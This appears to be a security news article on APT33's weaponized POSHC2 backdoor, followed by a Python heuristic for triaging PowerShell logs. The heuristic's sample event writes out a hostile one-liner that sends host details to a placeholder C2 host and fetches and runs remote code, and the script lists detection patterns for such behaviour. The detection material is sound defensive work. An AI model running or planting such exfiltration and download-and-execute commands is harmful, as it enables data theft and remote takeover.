Cybersecurity experts have been using a tool called POSHC2 to make sure that the networks they administer are safe from cyber-attacks. POSHC2 is an exploitation framework aimed at penetration testers in particular. However, the POSHC2 framework is a free tool, and all of its source code is freely available to anyone who is interested. Naturally, this has attracted the attention of cyber crooks, who have altered the framework's code slightly and managed to turn it into a fully weaponized hacking tool. These threatening variants of the POSHC2 framework can be used to target companies and individuals alike.
Operations Targeting Major Industries
Among the threat actors taking advantage of the weaponized POSHC2 framework is the APT33 (Advanced Persistent Threat) group, also known under the alias Elfin Team. This hacking group is believed to be located in Iran, and it has been launching campaigns targeting businesses and institutions in the United States, South Korea and Saudi Arabia. It would appear that APT33 acquired a taste for the POSHC2 framework, as the group used it in numerous campaigns in 2018. Two of their targets were the aviation and engineering industries. The hacking group set up a timer that would terminate the activity of the weaponized variant of the POSHC2 framework on July 29, 2018. Not many threat actors take this measure, but some prefer to be on the safe side and leave fewer traces for cybersecurity experts.
Operates as a Backdoor Trojan
The POSHC2 framework has essentially been turned into a backdoor Trojan, and it behaves much like a regular one. Once it compromises a target, the POSHC2 backdoor begins collecting information about the host: system hardware, installed software, username, PC name and the Process ID of the threat. All the collected information is then exfiltrated to the C&C (Command & Control) server run by the operators of the POSHC2 backdoor. The POSHC2 backdoor can receive remote commands from the C&C server, and with its help it is also capable of downloading and executing additional malware on the compromised machine. Furthermore, this iteration of the POSHC2 framework can also execute PowerShell commands.
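The behaviour described above (host reconnaissance, exfiltration to a C&C server, and downloading further code for PowerShell to execute) is what a defender can look for in PowerShell script block logs. The following is an added example, not part of the original article or of the POSHC2 project: a small triage heuristic over constructed log entries that flags a script only when host-enumeration patterns appear together with network I/O or dynamic execution. The category patterns and sample events are illustrative assumptions, not POSHC2 signatures.

```python
import re

# Constructed sample script-block log entries (shape of Event ID 4104 text); not real telemetry.
SAMPLE_EVENTS = [
    {"id": "evt-1", "script": "Get-ChildItem C:\\Logs | Where-Object {$_.Length -gt 1MB} | Remove-Item"},
    {"id": "evt-2", "script": "$h=$env:COMPUTERNAME;$u=$env:USERNAME;$p=$PID;"
                              "$os=(Get-WmiObject Win32_OperatingSystem).Caption;"
                              "$wc=New-Object Net.WebClient;"
                              "$wc.UploadString('https://c2.example.invalid/up',\"$h|$u|$p|$os\");"
                              "IEX($wc.DownloadString('https://c2.example.invalid/task'))"},
    {"id": "evt-3", "script": "Write-Host $env:COMPUTERNAME; Get-WmiObject Win32_Processor | Select Name"},
]

# One regex group per behaviour named in the threat description (illustrative, not exhaustive).
CATEGORIES = {
    "host_recon": [r"\$env:COMPUTERNAME", r"\$env:USERNAME", r"\$PID\b",
                   r"Win32_(OperatingSystem|ComputerSystem|Processor|Product)", r"Get-ComputerInfo"],
    "network": [r"Net\.WebClient", r"Invoke-WebRequest", r"Invoke-RestMethod",
                r"UploadString|UploadData", r"DownloadString|DownloadData|DownloadFile"],
    "dynamic_exec": [r"\bIEX\b", r"Invoke-Expression", r"\[Reflection\.Assembly\]::Load"],
}


def categorize(script: str) -> dict:
    """Return, per category, the list of patterns that matched the script text."""
    hits = {}
    for name, patterns in CATEGORIES.items():
        matched = [p for p in patterns if re.search(p, script, re.IGNORECASE)]
        if matched:
            hits[name] = matched
    return hits


def is_suspicious(hits: dict) -> bool:
    """Recon alone is common in admin scripts; flag it only when paired with
    outbound transfer or dynamic code execution, the backdoor pattern described."""
    return "host_recon" in hits and ("network" in hits or "dynamic_exec" in hits)


def triage(events) -> list:
    """Return (event id, sorted category names) for every event that looks suspicious."""
    results = []
    for event in events:
        hits = categorize(event["script"])
        if is_suspicious(hits):
            results.append((event["id"], sorted(hits)))
    return results


if __name__ == "__main__":
    for event_id, categories in triage(SAMPLE_EVENTS):
        print(f"{event_id}: {', '.join(categories)}")
```

Real script block logs are split across multiple 4104 events for long scripts, so in practice the fragments of one ScriptBlockId should be joined before scoring.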
It is not uncommon for cyber crooks to hijack a legitimate application and weaponize it. Businesses need to take their cybersecurity more seriously.